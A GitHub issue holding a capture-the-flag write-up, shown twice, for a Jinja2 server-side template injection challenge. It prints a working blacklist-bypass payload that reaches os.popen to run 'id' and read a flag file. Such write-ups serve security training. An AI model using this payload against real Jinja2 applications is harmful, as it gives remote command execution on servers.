You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I am trying to make my own version of notion named lotion , Can you do security check for my app? http://chall.nitdgplug.org:30014/
Writeup:
We see the SSTI Jinja2 vulnerability, but with a blacklist. We cannot use ". []". Searching in Google we find this code: {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
And it is working! Checking the dir and see the directory secret-note with file flag inside. Get the flag with note: {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat secret-note/flag')|attr('read')()}}
Flag: GLUG{INJECTED_PR3TTY_G00D_HUH}
The text was updated successfully, but these errors were encountered:
I am trying to make my own version of notion named lotion , Can you do security check for my app? http://chall.nitdgplug.org:30014/
Writeup:
We see the SSTI Jinja2 vulnerability, but with a blacklist. We cannot use ". []". Searching in Google we find this code:
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
And it is working! Checking the dir and see the directory
secret-note
with file flag inside. Get the flag with note:{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat secret-note/flag')|attr('read')()}}
Flag:
GLUG{INJECTED_PR3TTY_G00D_HUH}
The text was updated successfully, but these errors were encountered: